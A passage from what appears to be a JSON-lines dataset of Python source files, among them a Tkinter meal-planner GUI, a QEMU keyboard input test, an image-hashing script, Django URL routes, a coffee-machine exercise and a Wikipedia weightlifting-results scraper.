15,fill='#203e5f')\ncan1.bind('test',test )\nbu1 = Button(topframe, text='Calender', highlightbackground='#eec550', command=cal)\nbu2 = Button(topframe, text='Add A Recepie', highlightbackground='#eec550', command=test)\nbu3 = Button(topframe, text='Shopping List', highlightbackground='#eec550', command=test)\ncan1.grid(row=0, column=0)\nbu1.grid(row=0, column=1)\nbu2.grid(row=0, column=2)\nbu3.grid(row=0, column=3, padx=(1, 130))\n\ncal = Frame(main, bg='#203e5f', height='50', width='350')\ncal.grid(row=1, column=0)\nday1 = Label(cal, text='Monday', bg='#203e5f')\nday2 = Label(cal, text='Tuesday', bg='#203e5f')\nday3 = Label(cal, text='Wendsday', bg='#203e5f')\nday4 = Label(cal, text='Thursday', bg='#203e5f')\nday5 = Label(cal, text='Friday', bg='#203e5f')\nday6 = Label(cal, text='Saturday', bg='#203e5f')\nday7 = Label(cal, text='Sunday', bg='#203e5f')\nday1.grid(row=0, column=0)\nday2.grid(row=0, column=1)\nday3.grid(row=0, column=2)\nday4.grid(row=0, column=3)\nday5.grid(row=0, column=4)\nday6.grid(row=0, column=5)\nday7.grid(row=0, column=6)\n\nday1f = Label(cal, text='Food1', bg='#203e5f')\nday2f = Label(cal, text='Food2', bg='#203e5f')\nday3f = Label(cal, text='Food3', bg='#203e5f')\nday4f = Label(cal, text='Food4', bg='#203e5f')\nday5f = Label(cal, text='Food5', bg='#203e5f')\nday6f = Label(cal, text='Food6', bg='#203e5f')\nday7f = Label(cal, text='Food7', bg='#203e5f')\nday1f.grid(row=1, column=0)\nday2f.grid(row=1, column=1)\nday3f.grid(row=1, column=2)\nday4f.grid(row=1, column=3)\nday5f.grid(row=1, column=4)\nday6f.grid(row=1, column=5)\nday7f.grid(row=1, column=6)\n\nunits1 = StringVar(main)\nunits2 = StringVar(main)\nchoices = [\n 'Choose',\n 'Meters',\n 'Miles'\n]\nunits1.set('Choose')\nunits2.set('Choose')\n\notr = Frame(main, bg='#203e5f', height='50', width='50')\notr.grid(row=2, column=0, pady=(10,0))\nconl = Label(otr, text='Easy Converter', bg='#203e5f')\ncon1 = OptionMenu(otr, units1, *choices)\ncon2 = OptionMenu(otr, units2, *choices)\nconin1 = Entry(otr, highlightbackground='#203e5f')\nconin2 = Entry(otr, highlightbackground='#203e5f')\nconl.grid(row=0, column=0)\ncon1.grid(row=1, column=0)\ncon2.grid(row=1, column=1)\nconin1.grid(row=2, column=0)\nconin2.grid(row=2, column=1)\n\npr = Frame(main, bg='#203e5f', height='50', width='50')\npr.grid(row=3, column=0, pady=(10,0))\np1 = Button(pr, text='Print Calender', highlightbackground='#203e5f', command=test)\np2 = Button(pr, text='Print List', highlightbackground='#203e5f', command=test)\np3 = Button(pr, text='Print Recipie', highlightbackground='#203e5f', command=test)\np1.grid(row=0, column=0)\np2.grid(row=1, column=0)\np3.grid(row=2, column=0)\n\nrate = StringVar()\n\nrd = Frame(main, bg='#203e5f', height='50', width='50')\nrd.grid(row=4, column=0, pady=(10,0))\nla = Label(rd, text='How would you rate your most recent meal?', bg='#203e5f')\nr1 = Radiobutton(rd, text='1', variable=rate, value='1', bg='#203e5f')\nr2 = Radiobutton(rd, text='2', variable=rate, value='2', bg='#203e5f')\nr3 = Radiobutton(rd, text='3', variable=rate, value='3', bg='#203e5f')\nr4 = Radiobutton(rd, text='4', variable=rate, value='4', bg='#203e5f')\nr5 = Radiobutton(rd, text='5', variable=rate, value='5', bg='#203e5f')\nla.grid(row=0, column=0)\nr1.grid(row=1, column=1)\nr2.grid(row=1, column=2)\nr3.grid(row=1, column=3)\nr4.grid(row=1, column=4)\nr5.grid(row=1, column=5)\n","repo_name":"Pika-Codes/Unit1-Proj","sub_path":"Proto2.py","file_name":"Proto2.py","file_ext":"py","file_size_in_byte":4715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43240171889","text":"# Join Two Lists\r\n\r\nlist1 = [\"a\", \"b\", \"c\"]\r\nlist2 = [1, 2, 3]\r\n\r\nlist3 = list1 + list2 # Joins list1 and list2 two under list3\r\nprint(list3)\r\n\r\nfor x in list2: # all of the items in list2\r\n list1.append(x) # are appended at the end of list 1\r\nprint(list1) \r\n\r\nlist1.extend(list2) # add the items from list2 to list1\r\nprint(list1)","repo_name":"levislowe/Python_Practice","sub_path":"27JoinLists.py","file_name":"27JoinLists.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16039351970","text":"import json\nimport os\nimport time\nimport logging\n\nfrom virttest import error_context\nfrom virttest import utils_test\nfrom virttest import graphical_console\nfrom virttest import data_dir\nfrom provider import input_event_proxy\n\n\ndef get_keycode_cfg(filename):\n \"\"\"\n Get keyname to keycode cfg table.\n :param filename: filename that key to keycode file.\n \"\"\"\n keycode_cfg_path = os.path.join(data_dir.get_deps_dir(\"key_keycode\"), filename)\n print(keycode_cfg_path)\n with open(keycode_cfg_path) as f:\n return json.load(f)\n\n\n@error_context.context_aware\ndef key_tap_test(test, params, vm):\n \"\"\"\n Keyboard test. Support single key and combination key tests.\n\n :param test: kvm test object\n :param params: dictionary with the test parameters\n :param vm: vm object\n \"\"\"\n\n def key_check(key):\n \"\"\"\n Check received key event match exepected key event.\n :param key: tested key name.\n \"\"\"\n events_queue = listener.events\n\n if '-' in key:\n key_lst = [key_check_cfg[k] for k in key.split('-')]\n else:\n key_lst = [key_check_cfg[key]]\n key_num = len(key_lst)\n key_event_lst = list()\n\n while not events_queue.empty():\n events = events_queue.get()\n key_event_lst.append((events[\"keyCode\"], events[\"type\"]))\n\n if len(key_event_lst) < 2 * key_num:\n test.fail(\"Reveived key events %s were not enough\" % key_event_lst)\n\n key_down_lst = list()\n for k, v in key_event_lst[:-key_num]:\n if v != 'KEYDOWN':\n test.fail(\"Received key {0} event type {1} was not KEYDOWN\").format(k, v)\n key_down_lst.append(k)\n\n if len(key_down_lst) != key_num or set(key_down_lst) != set(key_lst):\n test.fail(\"Key down event keycode error, received:{0},\"\n \"expect:{1}\").format(key_down_lst, key_lst)\n\n key_up_lst = list()\n for k, v in key_event_lst[-key_num:]:\n if v != 'KEYUP':\n test.fail(\"Received key {0} event type {1} was not KEYUP\").format(k, v)\n key_up_lst.append(k)\n\n if set(key_up_lst) != set(key_lst):\n test.fail(\"Key up event keycode error, received:{0},\"\n \"expect:{1}\").format(key_up_lst, key_lst)\n\n key_table_file = params.get('key_table_file')\n key_check_cfg = get_keycode_cfg(key_table_file)\n wait_time = float(params.get(\"wait_time\", 0.2))\n\n error_context.context(\"Start event listener in guest\", logging.info)\n listener = input_event_proxy.EventListener(vm)\n\n console = graphical_console.GraphicalConsole(vm)\n for key in key_check_cfg.keys():\n error_context.context(\"Send %s key tap to guest\" % key, logging.info)\n console.key_tap(key)\n error_context.context(\"Check %s key tap event received\"\n \"correct in guest\" % key, logging.info)\n time.sleep(wait_time)\n key_check(key)\n\n listener.clear_events()\n listener.cleanup()\n\n\n@error_context.context_aware\ndef run(test, params, env):\n \"\"\"\n Input keyboard test.\n\n 1) Log into the guest.\n 2) Check if the driver is installed and verified (only for win).\n 3) Send key and Check if the correct key event can be received.\n\n :param test: kvm test object\n :param params: Dictionary with the test parameters\n :param env: Dictionary with test environment.\n \"\"\"\n vm = env.get_vm(params[\"main_vm\"])\n vm.verify_alive()\n drivers = params.objects(\"driver_name\")\n\n if params[\"os_type\"] == \"windows\":\n session = vm.wait_for_login()\n\n error_context.context(\"Check vioinput driver is running\", logging.info)\n utils_test.qemu. windrv_verify_running(session, test, drivers[0])\n\n error_context.context(\"Enable all vioinput related driver verified\",\n logging.info)\n for driver in params.objects(\"driver_name\"):\n session = utils_test.qemu.setup_win_driver_verifier(session, driver, vm)\n session.close()\n\n error_context.context(\"Run keyboard testing\", logging.info)\n key_tap_test(test, params, vm)\n","repo_name":"SarahYu01/tp-qemu-2","sub_path":"qemu/tests/vioinput_keyboard.py","file_name":"vioinput_keyboard.py","file_ext":"py","file_size_in_byte":4167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41879701786","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport cv2\n\n#打开图片\n# img = cv2.imread('./origin.jpg')\n# cv2.namedWindow('img')\n# cv2.imshow('img',img)\n# cv2.waitKey(0)\n# cv2.destroyAllWindows()\n\nimg1 = cv2.imread('./origin.jpg')\nimg2 = cv2.imread('./originCopy.jpg')\n\ntest1 = cv2.imread('./test1.jpg')\ntest2 = cv2.imread('./test2.jpg')\ntest3 = cv2.imread('./test3.jpg')\n\ncut = cv2.imread('./cut.jpg')\n\n#均值哈希算法\ndef aHash(img):\n #缩放为20*20\n img=cv2.resize(img,(20,20),interpolation=cv2.INTER_CUBIC)\n #转换为灰度图\n gray=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n #s为像素和初值为0,hash_str为hash值初值为''\n s=0\n hash_str=''\n #遍历累加求像素和\n for i in range(20):\n for j in range(20):\n s=s+gray[i,j]\n #求平均灰度\n avg=s/400\n #灰度大于平均值为1相反为0生成图片的hash值\n for i in range(20):\n for j in range(20):\n if gray[i,j]>avg:\n hash_str=hash_str+'1'\n else:\n hash_str=hash_str+'0' \n return hash_str\n\n#Hash值对比\ndef cmpHash(hash1,hash2):\n n=0\n #hash长度不同则返回-1代表传参出错\n if len(hash1)!=len(hash2):\n return -1\n #遍历判断\n for i in range(len(hash1)):\n #不相等则n计数+1,n最终为相似度\n if hash1[i]!=hash2[i]:\n n=n+1\n return n\n\nprint(aHash(img1))\nprint(aHash(img2))\n\nprint(aHash(test1))\nprint(aHash(test2))\nprint(aHash(test3))\n\nprint(aHash(cut))\n\nprint(cmpHash(aHash(img1),aHash(img2)))\nprint(cmpHash(aHash(img1),aHash(cut)))\nprint(cmpHash(aHash(img1),aHash(test1)))","repo_name":"ZCreturn0/llk_support","sub_path":"same-picture.py","file_name":"same-picture.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21198815010","text":"from django.urls import path\nfrom . import views\n\napp_name = 'leads'\n\nurlpatterns = [\n path('',views.LeadListView.as_view(), name='lead-section'),\n # path('',views.leads_list, name='lead-section'),\n \n path('create_lead/',views.LeadCreateView.as_view(), name='create'),\n # path('create_lead/',views.lead_create, name='create'),\n \n path('/update/', views.LeadUpdateView.as_view(), name='update'),\n # path('/update/', views.lead_update, name='update'),\n \n path('/', views.LeadDetailView.as_view(), name='lead-detail'),\n # path('/',views.lead_detail, name='lead-detail'),\n \n path('delete//', views.LeadDeleteView.as_view(), name='delete'),\n # path('delete//', views.lead_delete, name='delete'),\n]\n ","repo_name":"Great-special/testProjects","sub_path":"CRMSource/leads/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6246081330","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nimport re\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport concurrent.futures\nimport os\nfrom glob import glob\n\n\n# In[ ]:\n\n\nyears_list = [1996 + x for x in range(24)]\n\nolympic_years_list = [1980 + x for x in range(0, 40, 4)]\n\ncountry_codes = pd.read_html(\"https://www.iban.com/country-codes\")[0]\n\nclass CheckFunctions():\n \n @staticmethod\n def check_group(results_dataframe):\n# try: \n if not \"Group\\n\" in results_dataframe.iloc[0].values:\n results_dataframe.insert(2, \"Group\", \"A\")\n return results_dataframe\n else: \n return results_dataframe\n\n @staticmethod\n def check_bodyweight(results_dataframe):\n if not \"Bodyweight\\n\" in results_dataframe.iloc[0].values:\n if not \"Body weight\\n\" in results_dataframe.iloc[0].values:\n if not \"Body Weight\\n\" in results_dataframe.iloc[0].values:\n results_dataframe.insert(3, \"Body Weight (kg)\", \"NaN\")\n return results_dataframe\n else:\n return results_dataframe\n\n @staticmethod\n def check_nation(results_dataframe):\n if not \"Nation\\n\" in results_dataframe.iloc[0].values:\n new_cols = results_dataframe[1].str.split(\"(\", 1, expand=True)\n results_dataframe[1] = new_cols[0]\n results_dataframe.insert(2, \"Nationality\", new_cols[1])\n results_dataframe[\"Nationality\"] = results_dataframe[\"Nationality\"].str.strip(\")\")\n return results_dataframe\n else:\n return results_dataframe\n \n @staticmethod\n def check_max_lift(results_dataframe):\n if not \"Result\\n\" in results_dataframe.iloc[1].values:\n results_dataframe.insert(8, \"Max Snatch\", 0)\n results_dataframe.insert(13, \"Max C/J\", 0)\n return results_dataframe\n else:\n return results_dataframe\n\n @staticmethod\n def check_rank(results_dataframe):\n if not \"Rank\\n\" in results_dataframe.iloc[1].values:\n results_dataframe.insert(9, \"Snatch Rank\", 0)\n results_dataframe.insert(14, \"C/J Rank\", 0)\n return results_dataframe\n else:\n results_dataframe.rename({9: \"Snatch Rank\", 14: \"C/J Rank\"})\n return results_dataframe\n \nclass WikiParser():\n \n @staticmethod\n def get_h1_text(website_url):\n url = requests.get(website_url)\n page = BeautifulSoup(url.text, 'lxml')\n header_id = page.find(\"h1\", id=\"firstHeading\").get_text()\n return header_id\n \n @staticmethod\n # Create a function to grab all of the results urls from each weight class of the competition year\n def process_urls(url):\n website_url = requests.get(url)\n page = BeautifulSoup(website_url.text, \"lxml\")\n results_urls = []\n for link in page.find_all(\"a\", attrs={\"href\": re.compile(f\"^{url[24:]}_\")}):\n results_urls.append(link.get('href'))\n return results_urls\n \n @staticmethod\n def iwf_competitions_to_dataframe(website_url, header_name):\n # parse html; find table; find table rows\n url = requests.get(website_url)\n page = BeautifulSoup(url.text, 'lxml')\n header_id = page.find(\"span\", id=header_name)\n wiki_table = header_id.parent.find_next_sibling(\"table\", class_=\"wikitable\")\n table_cells = wiki_table.find('td')\n table_rows = wiki_table.find_all(\"tr\")\n # Iterate through rows and load text into a list\n results_table = []\n for row in table_rows:\n table_tags = row.find_all([\"th\", \"td\"])\n td = list(item.text for item in table_tags)\n results_table.append(td)\n results_df = pd.DataFrame(results_table)\n return results_df\n \n @staticmethod\n def iwf_links(website_url, header_name, years_list):\n # parse html; find table; find table rows\n url = requests.get(website_url)\n page = BeautifulSoup(url.text, 'lxml')\n header_id = page.find(\"span\", id=header_name)\n wiki_table = header_id.parent.find_next_sibling(\"table\", class_=\"wikitable\")\n # Iterate through rows and load text into a list\n links_list = []\n for link in wiki_table.find_all(\"a\"):\n for year in years_list:\n if f\"{year}\" in link.get_text():\n links_list.append(link.get(\"href\"))\n return links_list\n \n @staticmethod\n def oly_links(website_url, div_id, years_list):\n # parse html; find table; find table rows\n url = requests.get(website_url)\n page = BeautifulSoup(url.text, 'lxml')\n page_details = page.find(\"div\", id=div_id)\n oly_years_table = page_details.find(\"table\", class_=\"infobox\")\n # Iterate through rows and load text into a list\n links_list = []\n for link in oly_years_table.find_all(\"a\"):\n for year in olympic_years_list:\n if f\"{year}\" in link.get_text():\n links_list.append(link.get(\"href\"))\n return links_list\n \n @staticmethod\n def results_to_dataframe(website_url, header_name):\n # parse html; find table; find table rows\n url = requests.get(website_url)\n page = BeautifulSoup(url.text, 'lxml')\n header_id = page.find(\"span\", id=header_name)\n wiki_table = header_id.parent.find_next_sibling(\"table\", class_=\"wikitable\")\n table_cells = wiki_table.find('td')\n table_rows = wiki_table.find_all(\"tr\")\n # Iterate through rows and load text into a list\n results_table = []\n for elem in table_rows:\n strikethrough = elem.find_all(\"s\")\n bold = elem.find_all(\"b\")\n for string in strikethrough:\n negative = \"\".join(f\"-{string.get_text()}\")\n string.replace_with(negative)\n for string in bold:\n non_bold = \"\".join(f\"{string.get_text()}\")\n string.replace_with(non_bold)\n for tag in table_rows:\n table_tags = tag.find_all([\"th\", \"td\"])\n td = []\n for text in table_tags:\n td.append(text.get_text())\n results_table.append(td)\n results_df = pd.DataFrame(results_table)\n return results_df\n \nclass ResultsCleanup():\n \n @staticmethod\n def column_row_cleanup(results_dataframe):\n CheckFunctions.check_group(results_dataframe)\n CheckFunctions.check_bodyweight(results_dataframe)\n CheckFunctions.check_nation(results_dataframe)\n CheckFunctions.check_max_lift(results_dataframe)\n CheckFunctions.check_rank(results_dataframe)\n column_names = (\n \"Comp Rank, Athlete Name, Nationality, Group, Body Weight (kg), \"\n \"Snatch 1 (kg), Snatch 2 (kg), Snatch 3 (kg), Max Snatch, Snatch Rank, \"\n \"C/J 1 (kg), C/J 2 (kg), C/J 3 (kg), Max C/J, C/J Rank, Total\"\n ).split(\", \")\n results_dataframe.columns = column_names\n results_dataframe.drop([0,1], inplace=True)\n results_dataframe.reset_index(inplace=True)\n results_dataframe.drop(\"index\", axis=1, inplace=True)\n # Change country name to country code for consistency\n CheckFunctions.change_nation_code(results_dataframe)\n return results_dataframe\n\n @staticmethod\n def check_float(string):\n try:\n float(string)\n return True\n except ValueError:\n return False\n \n @staticmethod\n def string_to_float(converted_list):\n for elem in converted_list:\n if ResultsCleanup.check_float(elem):\n rational = float(elem)\n index = converted_list.index(elem)\n converted_list.pop(index)\n converted_list.insert(index, rational)\n elif ResultsCleanup.check_float(elem) == False:\n index = converted_list.index(elem)\n converted_list.pop(index)\n converted_list.insert(index, 0)\n else:\n print(\"error\")\n return converted_list\n \n @staticmethod\n def lift_rankings(results_dataframe, lift_col_names, max_lift, lift_rank):\n \"\"\"Note: lift_col_names = [\"Snatch 1 (kg)\", \"Snatch 2 (kg)\", \"Snatch 3 (kg)\"] \n or [\"C/J 1 (kg)\", \"C/J 2 (kg)\", \"C/J 3 (kg)\"]\n Note: max_lift = 'Max Snatch' or 'Max C/J' \n Note: lift_rank = 'Snatch Rank' or 'C/J Rank'\"\"\"\n temp_list = results_dataframe[lift_col_names].values.tolist()\n max_weight = []\n for elem in temp_list:\n ResultsCleanup.string_to_float(elem)\n results_dataframe[lift_col_names] = temp_list\n for row in temp_list:\n row.sort()\n for row in range(len(temp_list)):\n max_weight.append(temp_list[row][-1])\n # Sort the indices of the max lifts to get comp rank (overall place)\n max_lift_rankings = list(sorted(max_weight, reverse=True).index(num) + 1 for num in max_weight)\n results_dataframe[max_lift] = max_weight\n results_dataframe[lift_rank] = max_lift_rankings\n return results_dataframe\n\n @staticmethod\n def data_cleanup(results_dataframe):\n podium = [1, 2, 3]\n for i in range(len(podium)):\n results_dataframe[\"Comp Rank\"][i] = podium[i]\n results_dataframe.replace(\"\\n\", \"\", regex=True, inplace = True)\n results_dataframe.replace(\"\\xa0\", \"\", regex=True, inplace=True)\n results_dataframe.replace(\"None\", \"\", regex=True, inplace=True)\n results_dataframe.fillna(\"NaN\", inplace = True)\n # Some cells have \"OR\" or \"=OR\" to indicate Olympic Record.\n # The following .split() func delete any data after the digit\n results_dataframe[\"Snatch 1 (kg)\"] = results_dataframe[\"Snatch 1 (kg)\"].str.split().str[0]\n results_dataframe[\"Snatch 2 (kg)\"] = results_dataframe[\"Snatch 2 (kg)\"].str.split().str[0]\n results_dataframe[\"Snatch 3 (kg)\"] = results_dataframe[\"Snatch 3 (kg)\"].str.split().str[0]\n results_dataframe[\"C/J 1 (kg)\"] = results_dataframe[\"C/J 1 (kg)\"].str.split().str[0]\n results_dataframe[\"C/J 2 (kg)\"] = results_dataframe[\"C/J 2 (kg)\"].str.split().str[0]\n results_dataframe[\"C/J 3 (kg)\"] = results_dataframe[\"C/J 3 (kg)\"].str.split().str[0]\n results_dataframe[\"Total\"] = results_dataframe[\"Total\"].astype(str).str.split().str[0]\n results_dataframe[\"Body Weight (kg)\"] = ResultsCleanup.string_to_float(results_dataframe[\"Body Weight (kg)\"].values.tolist())\n results_dataframe[\"Comp Rank\"] = ResultsCleanup.string_to_float(results_dataframe[\"Comp Rank\"].values.tolist())\n results_dataframe[\"Total\"] = ResultsCleanup.string_to_float(results_dataframe[\"Total\"].values.tolist())\n return results_dataframe\n\nclass datatable_cleanup():\n \n @staticmethod\n def insert_year(website_url):\n if website_url[30:43] == \"Weightlifting\":\n year = website_url[51:55]\n return year\n else:\n year = website_url[30:34]\n return year \n \n @staticmethod\n def insert_gender(website_url):\n if website_url[79:82] == \"Men\":\n gender = \"M\"\n return gender\n elif website_url[79:84] == \"Women\":\n gender = \"W\"\n return gender\n elif website_url[82:85] == \"Men\":\n gender = \"M\"\n return gender\n elif website_url[82:87] == \"Women\":\n gender = \"W\"\n return gender\n \n @staticmethod\n def country_code_cleanup(dataframe):\n iso_country_codes = pd.read_csv(\"country-codes-alpha-3-only.csv\")\n iso_country_codes.drop(\"Unnamed: 0\", axis=1, inplace=True)\n ioc_country_codes = pd.read_csv(\"country-codes-ioc.csv\")\n ioc_country_codes.drop(\"Unnamed: 0\", axis=1, inplace=True)\n for country in dataframe[\"Nationality\"].values.tolist():\n if country in iso_country_codes[\"Country\"].values.tolist():\n iso_dataframe_index = dataframe[\"Nationality\"].values.tolist().index(country)\n iso_code_index = iso_country_codes[\"Country\"].values.tolist().index(country)\n iso_code = iso_country_codes[\"Alpha-3 code\"][iso_code_index]\n dataframe[\"Nationality\"][iso_dataframe_index] = iso_code\n elif country in ioc_country_codes[\"Country\"].values.tolist():\n ioc_dataframe_index = dataframe[\"Nationality\"].values.tolist().index(country)\n ioc_code_index = ioc_country_codes[\"Country\"].values.tolist().index(country)\n ioc_code = ioc_country_codes[\"IOC code\"][ioc_code_index]\n dataframe[\"Nationality\"][ioc_dataframe_index] = ioc_code\n return dataframe\n \n @staticmethod\n def insert_event(website_url):\n if website_url[30:43] == \"Weightlifting\":\n event = \"oly\"\n return event\n else:\n event = \"iwf\"\n return event\n \n @staticmethod\n def results_table(website_url):\n year = datatable_cleanup.insert_year(website_url)\n gender = datatable_cleanup.insert_gender(website_url)\n event = datatable_cleanup.insert_event(website_url)\n url_header = WikiParser.get_h1_text(website_url)\n header_name = \"Results\"\n snatch_cols = [\"Snatch 1 (kg)\", \"Snatch 2 (kg)\", \"Snatch 3 (kg)\"] \n clean_cols = [\"C/J 1 (kg)\", \"C/J 2 (kg)\", \"C/J 3 (kg)\"]\n df = WikiParser.results_to_dataframe(website_url, header_name)\n ResultsCleanup.column_row_cleanup(df)\n ResultsCleanup.data_cleanup(df)\n ResultsCleanup.lift_rankings(df, snatch_cols, \"Max Snatch\", \"Snatch Rank\")\n ResultsCleanup.lift_rankings(df, clean_cols, \"Max C/J\", \"C/J Rank\")\n df.insert(0,\"Year\", year)\n df.insert(1, \"Event\", event)\n df.insert(2, \"Gender\", gender)\n file_name = url_header + \".csv\"\n df.to_csv(file_name)\n return file_name\n \n @staticmethod\n def concat_csv(file_name):\n file_pattern = \".csv\"\n file_rename = file_name + file_pattern\n list_of_files = [file for file in glob(\"*{}\".format(file_pattern))]\n # Combine all files in the list into a dataframe\n dataframe_csv = pd.concat([pd.read_csv(file, engine=\"python\") for file in list_of_files])\n # Export the dataframe to csv\n dataframe_csv.to_csv(file_rename, index=False, encoding='utf-8')\n list_of_files\n return list_of_files\n\n\n# In[5]:\n\n\nget_ipython().system('jupyter nbconvert --to script webscraping_functions.ipynb')\n\n","repo_name":"jemvega/olympic-iwf-weightlifting-competition-results","sub_path":"webscraping_functions.py","file_name":"webscraping_functions.py","file_ext":"py","file_size_in_byte":14750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13695616688","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\n\ndef pickingNumbers(a):\n a1=sorted(a)\n l=[]\n for i in range(0,n):\n count=1\n for j in range(i+1,n):\n if abs(a1[i]-a1[j])<=1:\n count=count+1\n l.append(count)\n return max(l)\n\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = int(input().strip())\n\n a = list(map(int, input().rstrip().split()))\n\n result = pickingNumbers(a)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"vuggesaikalyan/Hackerank-Algorithms-python","sub_path":"picking numbers.py","file_name":"picking numbers.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"69940891002","text":"from sys import exit\n\nMENU = {\n \"espresso\": {\n \"ingredients\": {\n \"water\": 50,\n \"coffee\": 18,\n },\n \"cost\": 1.5,\n },\n \"latte\": {\n \"ingredients\": {\n \"water\": 200,\n \"milk\": 150,\n \"coffee\": 24,\n },\n \"cost\": 2.5,\n },\n \"cappuccino\": {\n \"ingredients\": {\n \"water\": 250,\n \"milk\": 100,\n \"coffee\": 24,\n },\n \"cost\": 3.0,\n }\n}\n\nresources = {\n \"water\": 300,\n \"milk\": 200,\n \"coffee\": 100,\n}\n\nmoney = 0\ntotal = 0\ncoins = {\n \"quarters\": 0.25,\n \"dimes\": 0.10,\n \"nickles\": 0.05,\n \"pennies\": 0.01\n}\n\n\ndef required(choice):\n \"\"\"This checks if the resources available cover the requested coffee. Returns True if resources sufficient else,\n RETURNS False \"\"\"\n for key in MENU[choice][\"ingredients\"]:\n if resources[key] < MENU[choice][\"ingredients\"][key]:\n print(f\"Sorry there isn't enough {key}\")\n return False\n return True\n\n\ndef coffee():\n \"\"\"the main function used to start the coffee machine process\"\"\"\n global total\n global money\n choice = input(\"What would you like? (espresso/latte/cappuccino): \").lower()\n if choice == \"random\":\n for key in resources:\n print(f\"{key} : {resources[key]}\")\n print(f\"money : {money}\")\n coffee()\n elif choice == \"off\":\n exit()\n elif choice == \"espresso\" or choice == \"latte\" or choice == \"cappuccino\":\n if required(choice):\n print(\"Please insert coins\")\n for key in coins:\n total += int(input(f\"How many {key}? \")) * coins[key]\n change = total - MENU[choice][\"cost\"]\n money += MENU[choice][\"cost\"]\n total = 0\n if change < 0:\n print(\"Sorry that's not enough money. Money refunded\")\n coffee()\n else:\n for key in MENU[choice][\"ingredients\"]:\n resources[key] -= MENU[choice][\"ingredients\"][key]\n print(f\"Here is ${round(change, 1)} in change\")\n print(f\"Here is your {choice} ☕ Enjoy!\")\n coffee()\n else:\n coffee()\n\n\ncoffee()\n","repo_name":"TMayowa/100-days-of-code","sub_path":"Day 15 - Coffee machine/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23509511476","text":"\"\"\"\r\n最邻近插值算法测试用例\r\nNearest_Interp_Example\r\ndata:2023.9.7\r\n\"\"\"\r\nimport cv2\r\nimport numpy as np\r\nfrom Nearest_Interp_2 import nearest_interp\r\n\r\nheight = 400\r\nwidth = 400\r\nout_dim = (height,width)\r\nimg = cv2.imread(\"D:\\\\subject_learning\\\\cv_learn\\\\project\\\\lenna.jpg\")\r\nempty_img = nearest_interp(img, out_dim)\r\n# empty_img = cv2.resize(img, (height, width),interpolation=cv2.INTER_NEAREST) # 使用resize()函数可替代,interpolation选择插值的方式\r\nprint('原图尺寸:', img.shape)\r\nprint(empty_img.shape)\r\ncv2.imshow('img', img)\r\ncv2.imshow('empty_img', empty_img)\r\ncv2.waitKey(0) # 在程序中添加一个等待键盘输入的循环,等待用户按下任意键后关闭图像窗口;不加会瞬间自动关闭打开的图像\r\n","repo_name":"OMG1-1/badou-ai-special-2023","sub_path":"252--尹业龙/week_2_Digital_image/Nearest_Interp_Example.py","file_name":"Nearest_Interp_Example.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"70854646522","text":"# -*- coding: utf-8 -*-\n'''\n@Time : 2021/3/1 19:33\n@Author : daluzi\n@File : 06.py\n'''\n\n# 剑指 Offer 06. 从尾到头打印链表\n# 输入一个链表的头节点,从尾到头反过来返回每个节点的值(用数组返回)。\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\nclass Solution:\n def reversePrint(self, head: ListNode) -> List[int]:\n # 递归\n # return self.reversePrint(head.next) + [head.val] if head else []\n\n # 辅助栈\n auxiliaryArray = []\n\n while head:\n auxiliaryArray.append(head.val)\n head = head.next\n\n return auxiliaryArray[::-1]","repo_name":"daluzi/CodeInterview","sub_path":"06.py","file_name":"06.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24067059634","text":"\"\"\"\nНаписать скрипт, создающий стартер (заготовку) для проекта со следующей структурой папок:\n|--my_project\n |--settings\n |--mainapp\n |--adminapp\n |--authapp\nПримечание: подумайте о ситуации, когда некоторые папки уже есть на диске (как быть?); как\nлучше хранить конфигурацию этого стартера, чтобы в будущем можно было менять имена\nпапок под конкретный проект; можно ли будет при этом расширять конфигурацию и хранить\nданные о вложенных папках и файлах (добавлять детали)?\n\"\"\"\nimport os\n\ndef make_dir_from_dict(folder_dict, path):\n for element, below_element in folder_dict.items():\n #print(f'ключ: {element}, значение: {below_element}')\n if isinstance(element, str):\n os.makedirs(os.path.join(path, element), exist_ok=True)\n if isinstance(below_element, list):\n #print(f'Значение - список: {below_element}')\n for name_below_element in below_element:\n if isinstance(name_below_element, dict):\n make_dir_from_dict(name_below_element, os.path.join(path, element))\n elif name_below_element.find('.') != -1:\n f = open(os.path.join(path, element, name_below_element), 'w')\n f.close()\n else:\n os.makedirs(os.path.join(path, element, name_below_element), exist_ok=True)\n elif isinstance(below_element, dict):\n for key in below_element:\n print('Do somthing')\n make_dir_from_dict(key, os.path.join(path, element))\n elif isinstance(below_element, str):\n #print(f'Below_element - str: {below_element}')\n if below_element.find('.') != -1:\n f = open(os.path.join(path, element, below_element), 'w')\n f.close()\n else:\n os.makedirs(os.path.join(path, element, below_element), 